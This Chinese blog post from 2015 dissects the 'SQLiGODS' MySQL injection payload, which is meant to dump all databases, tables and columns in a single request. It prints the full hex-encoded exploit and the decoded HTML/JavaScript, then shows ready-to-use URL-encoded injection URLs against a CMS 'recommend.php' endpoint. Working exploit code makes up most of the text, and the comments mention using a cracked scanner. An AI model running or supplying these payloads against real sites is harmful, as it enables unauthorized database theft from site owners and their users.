从SQLiGODS里面得到的一点tips

发布时间:April 26, 2015 // 分类:代码学习,mysql // No Comments

Referer:http://zone.wooyun.org/content/16039

这里介绍了一个exp,可以一次性dump出全部的数据。之前一直感觉很强大,各种膜拜。后来接触一段时间后打算深入地研究下具体的过程。于是有了此文

concat(0x3c7363726970743e6e616d653d70726f6d70742822506c6561736520456e74657220596f7572204e616d65203a2022293b2075726c3d70726f6d70742822506c6561736520456e746572205468652055726c20796f7527726520747279696e6720746f20496e6a65637420616e6420777269746520276d616b6d616e2720617420796f757220496e6a656374696f6e20506f696e742c204578616d706c65203a20687474703a2f2f736974652e636f6d2f66696c652e7068703f69643d2d3420554e494f4e2053454c45435420312c322c332c636f6e6361742830783664363136622c6d616b6d616e292c352d2d2b2d204e4f5445203a204a757374207265706c61636520796f757220496e6a656374696f6e20706f696e742077697468206b6579776f726420276d616b6d616e2722293b3c2f7363726970743e,0x3c623e3c666f6e7420636f6c6f723d7265643e53514c69474f44732053796e746178205620312e30204279204d616b4d616e3c2f666f6e743e3c62723e3c62723e3c666f6e7420636f6c6f723d677265656e2073697a653d343e496e6a6563746564206279203c7363726970743e646f63756d656e742e7772697465286e616d65293b3c2f7363726970743e3c2f666f6e743e3c62723e3c7461626c6520626f726465723d2231223e3c74723e3c74643e44422056657273696f6e203a203c2f74643e3c74643e3c666f6e7420636f6c6f723d626c75653e20,version(),0x203c2f666f6e743e3c2f74643e3c2f74723e3c74723e3c74643e2044422055736572203a203c2f74643e3c74643e3c666f6e7420636f6c6f723d626c75653e20,user(),0x203c2f666f6e743e3c2f74643e3c2f74723e3c74723e3c74643e5072696d617279204442203a203c2f74643e3c74643e3c666f6e7420636f6c6f723d626c75653e20,database(),0x203c2f74643e3c2f74723e3c2f7461626c653e3c62723e,0x3c666f6e7420636f6c6f723d626c75653e43686f6f73652061207461626c652066726f6d207468652064726f70646f776e206d656e75203a203c2f666f6e743e3c62723e,concat(0x3c7363726970743e66756e6374696f6e20746f48657828737472297b76617220686578203d27273b666f722876617220693d303b693c7374722e6c656e6774683b692b2b297b686578202b3d2027272b7374722e63686172436f646541742869292e746f537472696e67283136293b7d72657475726e206865783b7d66756e6374696f6e2072656469726563742873697465297b6d616b73706c69743d736974652e73706c697428222e22293b64626e616d653d6d616b73706c69745b305d3b74626c6e616d653d6d616b73706c69745b315d3b6d616b7265703d22636f6e636174284946284074626c3a3d3078222b746f4865782874626c6e616d65292b222c3078302c307830292c4946284064623a3d3078222b746f4865782864626e616d65292b222c3078302c307830292c636f6e6361742830783363373336333732363937303734336537353732366333643232222b746f4865782875726c292b2232323362336332663733363337323639373037343365292c636f6e63617428636f6e6361742830783363373336333732363937303734336536343632336432322c4064622c307832323362373436323663336432322c4074626c2c3078323233623363326637333633373236393730373433652c30783363363233653363363636663665373432303633366636633666373233643732363536343365323035333531346336393437346634343733323035333739366537343631373832303536323033313265333032303432373932303464363136623464363136653363326636363666366537343365336336323732336533633632373233653534363136323663363532303465363136643635323033613230336336363666366537343230363336663663366637323364363236633735363533652c4074626c2c3078336332663636366636653734336532303636373236663664323036343631373436313632363137333635323033613230336336363666366537343230363336663663366637323364363236633735363533652c4064622c307833633266363636663665373433653363363237323365346537353664363236353732323034663636323034333666366337353664366537333230336132303363363636663665373432303633366636633666373233643632366337353635336533633733363337323639373037343365363336663663363336653734336432322c2853454c45435420636f756e7428636f6c756d6e5f6e616d65292066726f6d20696e666f726d6174696f6e5f736368656d612e636f6c756d6e73207768657265207461626c655f736368656d613d40646220616e64207461626c655f6e616d653d4074626c292c3078323233623634366636333735366436353665373432653737373236393734363532383633366636633633366537343239336233633266373336333732363937303734336533633266363636663665373433652c307833633632373233652c2873656c65637420284078292066726f6d202873656c656374202840783a3d30783030292c284063686b3a3d31292c202873656c656374202830292066726f6d2028696e666f726d6174696f6e5f736368656d612e636f6c756d6e732920776865726520287461626c655f736368656d613d3078222b746f4865782864626e616d65292b222920616e6420287461626c655f6e616d653d3078222b746f4865782874626c6e616d65292b222920616e642028307830302920696e202840783a3d636f6e6361745f777328307832302c40782c4946284063686b3d312c30783363373336333732363937303734336532303633366636633665363136643635323033643230366536353737323034313732373236313739323832393362323037363631373232303639323033643230333133622c30783230292c30783230363336663663366536313664363535623639356432303364323032322c636f6c756d6e5f6e616d652c307832323362323036393262326233622c4946284063686b3a3d322c307832302c30783230292929292978292c30783636366637323238363933643331336236393363336436333666366336333665373433623639326232623239376236343666363337353664363536653734326537373732363937343635323832323363363636663665373432303633366636633666373233643637373236353635366533653232326236393262323232653230336332663636366636653734336532323262363336663663366536313664363535623639356432623232336336323732336532323239336237643363326637333633373236393730373433652c636f6e6361742830783363363233652c307833633733363337323639373037343365373137353635373237393364323232323362363636663732323836393364333133623639336336333666366336333665373433623639326232623239376237313735363537323739336437313735363537323739326236333666366336653631366436353562363935643262323232633330373833323330333336313333363133323330326332323362376437353732366333643735373236633265373236353730366336313633363532383232323732323263323232353332333732323239336236343664373037313735363537323739336437353732366332653732363537303663363136333635323832323664363136623664363136653232326332323238373336353663363536333734323834303239323036363732366636643238373336353663363536333734323834303361336433303738333033303239323032633238373336353663363536333734323032383430323932303636373236663664323832323262363436323262323232653232326237343632366332623232323937373638363537323635323834303239323036393665323032383430336133643633366636653633363137343566373737333238333037383332333032633430326332323262373137353635373237393262323233303738333336333336333233373332333336353239323932393239363132393232323933623634366636333735366436353665373432653737373236393734363532383232336336313230363837323635363633643237323232623634366437303731373536353732373932623232323733653433366336393633366232303438363537323635323037343666323034343735366437303230373436383639373332303737363836663663363532303534363136323663363533633631336532323239336233633266373336333732363937303734336529292929223b75726c3d75726c2e7265706c616365282227222c2225323722293b75726c706173313d75726c2e7265706c61636528226d616b6d616e222c6d616b726570293b77696e646f772e6f70656e2875726c70617331293b7d3c2f7363726970743e3c73656c656374206f6e6368616e67653d22726564697265637428746869732e76616c756529223e3c6f7074696f6e2076616c75653d226d6b6e6f6e65222073656c65637465643e43686f6f73652061205461626c653c2f6f7074696f6e3e,(select (@x) from (select (@x:=0x00), (select (0) from (information_schema.tables) where (table_schema!=0x696e666f726d6174696f6e5f736368656d61) and (0x00) in (@x:=concat(@x,0x3c6f7074696f6e2076616c75653d22,UNHEX(HEX(table_schema)),0x2e,UNHEX(HEX(table_name)),0x223e,UNHEX(HEX(concat(0x4461746162617365203a3a20,table_schema,0x203a3a205461626c65203a3a20,table_name))),0x3c2f6f7074696f6e3e))))x),0x3c2f73656c6563743e),0x3c62723e3c62723e3c62723e3c62723e3c62723e)

顺便把这个exp给解码了,发现一点有意思的



<script> name=prompt("Please Enter Your Name : "); url=prompt("Please Enter The Url you're trying to Inject and write 'makman' at your Injection Point, Example : http://site.com/file.php?id=-4 UNION SELECT 1,2,3,concat(6d616b,makman),5—+- NOTE : Just replace your Injection point with keyword 'makman'"); </script> , //熟悉的开始地方 <b> <font color=red>SQLiGODs Syntax V 1.0 By MakMan</font><br><br> <font color=green size=4>Injected by <script>document.write(name);</script></font><br> <table border="1"> <tr><td>DB Version : </td> <td><font color=blue> ,version(), </font></td></tr> //version() <tr><td> DB User : </td> <td><font color=blue> ,user(), </font></td></tr> //user() <tr><td>Primary DB : </td> <td><font color=blue> ,database(), </td></tr></table> <br>, //database() <font color=blue>Choose a table from the dropdown menu : </font> <br>,concat( <script> function toHex(str){ //转换为16进制 var hex =''; for(var i=0;i<str.length;i++){ hex += ''+str.charCodeAt(i).toString(16); } return hex; } function redirect(site){ maksplit=site.split("."); dbname=maksplit[0]; tblname=maksplit[1]; makrep="concat( IF(@tbl:="+toHex(tblname)+",0,0), IF(@db:="+toHex(dbname)+",0,0), concat( <script> url=""+toHex(url)+""; //对url进行编码 </script>),concat(concat( <script>db=",@db,";tbl=",@tbl,";</script>,<b> <font color=red> SQLiGODs Syntax V 1.0 By MakMan</font><br><br> Table Name : <font color=blue>,@tbl,</font> from database : <font color=blue>,@db,</font> <br>Number Of Columns : <font color=blue> <script> colcnt=",(SELECT count(column_name) from information_schema.columns where table_schema=@db and table_name=@tbl),"; //SELECT count(column_name) from information_schema.columns where table_schema=@db and table_name=@tbl //查询某个表的数目 document.write(colcnt);</script> </font>,<br>, (select (@x) from (select (@x:=00),(@chk:=1), (select (0) from (information_schema.columns) where (table_schema="+toHex(dbname)+") and (table_name="+toHex(tblname)+") and (00) in (@x:=concat_ws(20,@x,IF(@chk=1, <script> colname = new Array(); var i = 1;,20), colname[i] = ",column_name,"; i++;,IF(@chk:=2,20,20)))))x),for(i=1;i<=colcnt;i++){ document.write("<font color=green>"+i+". </font>"+colname[i]+"<br>");}</script> , concat(<b>,<script>query="";for(i=1;i<colcnt;i++){ // query=query+colname[i]+", :: ,"; } url=url.replace("'","%27"); dmpquery=url.replace("makman","(select(@) from(select(@:=00) ,(select (@) from("+db+"."+tbl+")where(@) in (@:=concat_ws(20,@,"+query+"<br>))))a)"); //把makman替换为sql语句,这里就是我们需要查询的关键了 document.write("<a href='"+dmpquery+"'>Click Here to Dump this whole Table<a>");</script>))))"; url=url.replace("'","%27"); urlpas1=url.replace("makman",makrep); window.open(urlpas1); } </script> <select onchange="redirect(this.value)"> <option value="mknone" selected>Choose a Table</option>, (select (@x) from (select (@x:=00), (select (0) from (information_schema.tables) where (table_schema!=information_schema) and (00) in (@x:=concat(@x, <option value=",UNHEX(HEX(table_schema)),.,UNHEX(HEX(table_name)),">,UNHEX(HEX(concat(Database :: ,table_schema, :: Table :: ,table_name))),</option>))))x),</select>), <br><br><br><br><br>

把这个拆解开来,发现了其中的关键部分就是

select(@) from(select(@:=00) ,(select (@) from(&quot;+db+&quot;.&quot;+tbl+&quot;)where(@) in (@:=concat_ws(20,@,&quot;+query+&quot;

然后自己本地测试发现的是这样子的

SELECT @ FROM (SELECT @:=0,(SELECT @ FROM information_schema.columns WHERE @ IN (@:=CONCAT(@, 0x0a,concat_ws(0x3a,table_schema)))))x

列出全部的库

SELECT @ FROM (SELECT @:=0,(SELECT @ FROM information_schema.columns WHERE @ IN (@:=CONCAT(@, 0x0a,concat_ws(0x3a,table_schema,table_name)))))x

列出全部的表

 

然后列出全部的库,表,字段就是这样子了

SELECT @ FROM (SELECT @:=0,(SELECT @ FROM information_schema.columns WHERE @ IN (@:=CONCAT(@, 0x0a,concat_ws(0x3a,table_schema,table_name,column_name))) ) )x

数据太多,直接超时了

 

PS:当然这个的风险是很大的,比如我的CPU硬生生的耗完了

用到注入的地方,就是这样子。比如我们平时的都是这么注入的

http://xxx.xxx.xxx.xxx//plus/recommend.php?aid=1&amp;_FILES[type][name]&amp;_FILES[type][size]&amp;_FILES[type][type]&amp;_FILES[type][tmp_name]=aa%5c%27and+char(@`%27`)+/*!50000Union*/+/*!50000SeLect*/+1,2,3,(SELECT%20@%20FROM%20(SELECT%20@:=0,(SELECT%20@%20FROM%20information_schema.columns%20WHERE%20@%20IN%20(@:=CONCAT(@,%200x0a,concat_ws(0x3a,table_schema,table_name)))))x),5,6,7,8,9%23

利用上面的办法,我们来撸出全部的表还有字段

http://xxx.xxx.xxx.xxx//plus/recommend.php?aid=1&amp;_FILES[type][name]&amp;_FILES[type][size]&amp;_FILES[type][type]&amp;_FILES[type][tmp_name]=aa%5c%27and+char(@`%27`)+/*!50000Union*/+/*!50000SeLect*/+1,2,3,(SELECT%20@%20FROM%20(SELECT%20@:=0,(SELECT%20@%20FROM%20information_schema.columns%20WHERE%20@%20IN%20(@:=CONCAT(@,%200x0a,concat_ws(0x3a,table_schema,table_name)))))x),5,6,7,8,9%23

当然还可以一次性列出全部的表还有字段

http://xxx.xxx.xxx.xxx//plus/recommend.php?aid=1&_FILES[type][name]&_FILES[type][size]&_FILES[type][type]&_FILES[type][tmp_name]=aa%5c%27and+char(@`%27`)+/*!50000Union*/+/*!50000SeLect*/+1,2,3,(SELECT%20@%20FROM%20(SELECT%20@:=0,(SELECT%20@%20FROM%20information_schema.columns%20WHERE%20@%20IN%20(@:=CONCAT(@,%200x0a,concat_ws(0x3a,table_schema,table_name,column_name)))))x),5,6,7,8,9%2

相关文档:

标签:mysql, SQLiGODS

添加新评论 »

分类
最新文章
最近回复
  • 没穿底裤: 直接在hosts里面.激活的时候访问不到正确的地址
  • Sfish: 屏蔽更新是在控制台设置一下就可以了,还是说要在其他层面做一下限制,比如配置一下hosts让他升...
  • 没穿底裤: 激活,或者屏蔽地址禁止升级
  • 没穿底裤: 呃..这个思路不错啊..
  • Sfish: 博主好,想问一下,wvs11的破解版,是不是每隔一段时间就要重新激活一次才可以?有没有什么解决...